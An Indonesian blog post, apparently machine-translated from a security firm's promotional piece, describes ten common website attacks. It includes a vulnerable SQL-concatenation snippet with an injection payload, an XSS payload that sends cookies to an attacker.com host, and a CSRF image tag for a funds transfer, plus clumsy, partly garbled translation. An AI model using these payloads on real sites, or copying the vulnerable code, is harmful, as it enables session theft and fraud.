10 TEKNIK HACKER UNTUK ATTACK AND DEFANSE WEBSITE YANG SERING DIGUNAKAN


HLDN_news -  Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal semuanya memiliki kesamaan?
Mereka semua baru saja diretas.
Ya, hacking adalah ancaman yang berkembang untuk setiap bisnis baik besar maupun kecil.
Entah itu mencuri data pribadi, mengendalikan komputer Anda, atau mematikan situs Anda, peretas dapat secara serius mempengaruhi bisnis apa pun, kapan saja.
Defencely telah menjalankan analisis karena keberadaannya pada berbagai kemungkinan vektor serangan dan karenanya telah terbukti dengan catatan keamanan aplikasi web di India dan saat ini sedang berlangsung secara global. 
Ada beberapa spesifik tentang Defencely yang telah bekerja untuk membuat sebuah nama di portofolio CIO karena kesuksesannya yang luar biasa dengan Security Technology Information sebagai penyedia layanan.
Yang mengagumkan, Defencely tidak hanya bertahan dengan kliennya di masa lalu, tapi sekarang telah memberikan penelitian mendasar untuk semua kliennya dengan kiriman khusus yang diberikan layanan dari Defencely telah diikutsertakan.
Tapi ada sisi lain, yang telah dipilih oleh Defencely untuk memilih kemajuan dunia web, dan itu semua omong kosong WHITE HATEING yang membuat jalannya melalui dunia bisnis perusahaan dan menyediakan layanan keamanan mendalam untuk perlindungan keamanan web secara keseluruhan terhadap hal itu. Klien.
Terlepas dari masing-masing layanan yang diberikan oleh Defencely, ia mempertahankan standar yang bijaksana terhadap Bug Hunting dan karenanya merupakan keunggulan yang terbukti untuk kiriman kualitasnya yang dimiliki oleh Pakar Keamanan Tim Merah.
Tim merah telah mengambil tanggung jawab untuk mewakili Defencely dalam berbagai ucapan, entah itu mengenai menyebarkan masalah keamanan informasi, menghadiri konferensi keamanan informasi untuk memberikan tangan industri bebas biaya pada tes penetrasi untuk pendekatan awal dan ini saja telah menghasilkan pengurangan yang bijaksana. 
Bagaimana keamanan bisa menjadi ilusi bagi dunia usaha dan bagaimana bisnis bisa hancur semalaman.

Hacker dapat menyerang dengan berbagai cara, tapi inilah sepuluh cara paling populer yang dapat mengancam keamanan situs Anda, dan bisnis Anda:

10.  INJECTION ATTACKS
Injection Attacking terjadi ketika ada kelemahan pada Database SQL, SQL libraries, atau bahkan sistem operasi itu sendiri. Karyawan akan membuka file yang tampaknya kredibel dengan perintah tersembunyi, atau " injections", tanpa sadar.

Dengan melakukannya, mereka membiarkan peretas mendapatkan akses tidak sah ke data pribadi seperti nomor jaminan sosial, nomor kartu kredit atau data keuangan lainnya.

CONTOH INJECTION ATTACKS TEKNIS:
cara kerja: injection attack

Sebuah Injection Attack bisa memiliki command line ini:

String query = “SELECT * FROM accounts WHERE custID='” + request.getParameter(“id”) +”‘”;

Peretas memodifikasi parameter 'id' di browser mereka untuk mengirim: 'atau' 1 '=' 1. Ini mengubah makna kueri untuk mengembalikan semua catatan dari basis data akun ke peretas, bukan hanya pelanggan yang dimaksud.

9. CROSS SITE SCRIPTING ATTACKS

 Cross Site Scripting, juga dikenal sebagai serangan XSS, terjadi saat sebuah aplikasi, url "get request", atau paket file dikirim ke jendela browser web dan melewati proses validasi. Setelah skrip dipicu XSS, properti yang menipu membuat user yakin bahwa laman yang perlihatkan dari situs web tertentu adalah asli.
Misalnya, jika www.example.com/abcd.html memiliki skrip XSS di dalamnya, user mungkin melihat jendela yang meminta info kartu kredit dan info sensitif lainnya.

CONTOH SCRIPT SITUS TEKNIS CONTOH:
cara kerja: cross site scripting attack

Contoh yang lebih teknis:
(String) page += “<input name=’creditcard’ type=’TEXT’ value='” + request.getParameter(“CC”) + “‘>”; 

Penyerang memodifikasi parameter 'CC' di browser mereka untuk:
‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?
foo=’+document.cookie</script>’ 

Hal ini menyebabkan IDs user dikirim ke situs web penyerang, yang memungkinkan si hacker membajak sesi user saat ini. Itu berarti hacker memiliki akses ke kredensial admin situs web dan dapat mengambil kendali penuh atas hal itu. Dengan kata lain, hack itu.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

    Jika sistem otentikasi user situs Anda lemah, peretas bisa memanfaatkan sepenuhnya.
Sistem otentikasi melibatkan kata sandi, manajemen kunci, IDs, dan cookies yang memungkinkan hacker mengakses akun Anda dari komputer manapun (selama validasinya).
Jika seorang hacker memanfaatkan sistem manajemen otentikasi dan sesi, mereka dapat menganggap identitas user.
Menakutkan memang.

CONTOH:BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS
cara kerja: broken authentication and session management attacks

Tanyakan pada diri Anda pertanyaan-pertanyaan ini untuk mengetahui apakah situs Anda rentan terhadap serangan otentikasi dan sesi manajemen yang rusak:
  • Apakah kredensial user lemah (misalnya disimpan menggunakan hashing atau enkripsi)?
  • Dapatkah kredensial dapat ditebak atau ditimpa melalui fungsi pengelolaan akun yang lemah (misalnya pembuatan akun, ganti kata sandi, pemulihan kata sandi, IDs lemah)?
  • Apakah IDs terbuka di URL (misalnya penulisan ulang URL)?
  • Apakah IDs rentan terhadap serangan fiksasi sesi?
  • Apakah IDs timeout dan can users log out?

Jika Anda menjawab "ya" untuk pertanyaan-pertanyaan diatas, situs Anda bisa rentan terhadap hacker.

7. CLICKJACKING ATTACKS

Clickjacking, juga disebut UI Redress Attack, adalah ketika seorang hacker menggunakan beberapa lapisan buram untuk mengelabui user agar mengklik tampilan paling atas tanpa mereka sadari.
Dengan demikian penyerang "pembajakan" klik yang tidak dimaksudkan untuk halaman yang sebenarnya, tapi untuk halaman dimana penyerang menginginkannya.
Misalnya, dengan menggunakan kombinasi stylesheet, iframe, dan teks box yang dibuat dengan hati-hati,sehingga  user dapat dipercaya untuk mengetikkan kata sandi rekening bank mereka, namun sebenarnya mengetik ke dalam box yang  tak terlihat yang dikendalikan oleh penyerang atau hacker.

CONTOH:CLICKJACKING ATTACKS
cara kerja: clickjacking attack


6. DNS CACHE POISONING

dns cache poisoning melibatkan data cache yang lama yang menurut Anda tidak lagi ada di komputer Anda, namun sebenarnya masih ada.
Juga dikenal sebagai DNS Spoofing, hacker dapat mengidentifikasi kerentanan dalam sistem nama domain, yang memungkinkan mereka mengalihkan lalu lintas dari server legit ke situs web palsu dan / atau server.
Bentuk serangan ini bisa menyebar dan mereplikasi dirinya dari satu server DNS ke DNS lain, "meracuni segala sesuatu di jalan itu.
Sebenarnya, pada tahun 2010, serangan dns cache poisoning benar-benar membahayakan Great Firewall of China (GFC) untuk sementara dan menyensor konten tertentu di Amerika Serikat sampai masalahnya terpecahkan.
CONTOH:DNS CACHE POISONING
cara kerja: dns cache poisoning


5. SOCIAL ENGINEERIN G ATTACKS

Social engineering secara teknis bukanlah "hack".
Ini terjadi ketika Anda membocorkan informasi pribadi dengan itikad baik, seperti nomor kartu kredit, melalui interaksi online yang umum seperti email, obrolan, situs media sosial, atau hampir situs web apa pun.
Masalahnya, tentu saja, adalah Anda tidak mengerti apa yang Anda pikirkan.
CONTOH: SOCIAL ENGINEERING ATTACKS
cara kerja: social engineering attacks
Contoh klasik dari Social engineering attacks  adalah penipuan "dukungan teknologi Microsoft".
Ini terjadi ketika seseorang dari call center berpura-pura menjadi anggota dukungan teknis MS yang mengatakan bahwa komputer Anda lamban dan / atau terinfeksi, dan dapat diperbaiki dengan mudah - dengan biaya, tentu saja.

4. SYMLINKING -  AN INSIDER ATTACK
cara kerja: symlinking - an insider attack

A symlink pada dasarnya adalah file khusus yang "pints to" sebuah hard link pada sistem file yang terpasang. Serangan symlink terjadi ketika seorang hacker memposisikan symlink sedemikian rupa sehingga user atau aplikasi yang mengakses titik akhir berpikir bahwa mereka mengakses file yang benar padahal sebenarnya tidak.
Jika file endpoint adalah output, konsekuensi dari serangan symlink adalah bahwa hal itu dapat dimodifikasi alih-alih file di lokasi yang diinginkan. Modifikasi pada file endpoint bisa mencakup menambahkan, menimpa, merusak, atau bahkan mengubah perizinan.
Dalam variasi yang berbeda dari serangan symlink, hacker mungkin dapat mengendalikan perubahan pada sebuah file, memberikan akses lanjutan, memasukkan informasi palsu, mengungkapkan informasi sensitif atau merusak atau menghancurkan file sistem atau aplikasi penting.

3. CROSS SITE REQUEST FORGERY ATTACKS
cara kerja: CSRF

A Cross Site Request Forgery Attack terjadi saat user masuk ke sesi (atau akun) dan peretas menggunakan kesempatan ini untuk mengirimkan permintaan HTTP palsu untuk mengumpulkan informasi cookie mereka.
Dalam kebanyakan kasus, cookie tetap berlaku selama user atau penyerang tetap masuk ke akun. Inilah sebabnya mengapa situs web meminta Anda untuk keluar dari akun Anda saat selesai - segera akan berakhir.
Dalam kasus lain, saat sesi peramban user disusupi, peretas dapat mengajukan permintaan ke aplikasi yang tidak dapat membedakan user yang valid dan peretas.

CONTOH  A CROSS SITE ATTACK

 Inilah contohnya:
http://example.com/app/transferFunds?
amount=1500&destinationAccount=4673243243

<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?
amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

Dalam kasus ini, hacker membuat permintaan yang akan mentransfer uang dari akun user, dan kemudian menyematkan serangan ini dalam permintaan gambar atau iframe yang tersimpan di berbagai situs di bawah kendali penyerang.

2. REMOTE CODE EXECUTION ATTACKS
cara kerja: remote code execution attacks

Serangan Code Execution attack memanfaatkan kelemahan sisi server atau sisi klien.
Komponen yang rentan dapat mencakup libraries, direktori jarak jauh di server yang belum dipantau, frameworks, dan software modules lainnya yang dijalankan berdasarkan akses user yang terotentikasi. Aplikasi yang menggunakan komponen ini selalu diserang melalui hal-hal seperti skrip, malware, dan command line kecil yang mengekstrak informasi.
Komponen rentan berikut diunduh 22 juta kali di tahun 2011:
Apache CXF Authentication Bypass ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451 )
Dengan gagal memberi tanda identitas, penyerang dapat meminta layanan web dengan izin penuh.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK
cara kerja: DDOS attack 

 DDoS, atau Distributed Denial of Services, adalah tempat server atau layanan mesin dibuat tidak tersedia bagi usernya.
Dan saat sistem offline, peretas melanjutkan kompromi keseluruhan situs web atau fungsi spesifik situs web untuk keuntungan mereka sendiri.
Ini seperti memiliki mobil Anda dicuri saat Anda sedang terburu-buru untuk pergi ke suatu tempat.
DDoS biasa di manfaatkan biasa adalah untuk sementara mengganggu atau benar-benar merusak sistem yang berhasil dijalankan.
Contoh paling umum dari DDoS  attack bisa mengirim banyak permintaan URL ke situs web atau halaman web dalam jumlah yang sangat kecil. Hal ini menyebabkan bottlenecking di sisi server karena CPU kehabisan sumber daya.
Serangan denial-of-service dianggap sebagai pelanggaran terhadap kebijakan penggunaan Internet Architecture Board yang benar, dan juga melanggar kebijakan penggunaan yang dapat diterima dari hampir semua penyedia layanan Internet.
[Maxbutton id = "1"]

Subscribe to receive free email updates:

0 Response to "10 TEKNIK HACKER UNTUK ATTACK AND DEFANSE WEBSITE YANG SERING DIGUNAKAN"

Posting Komentar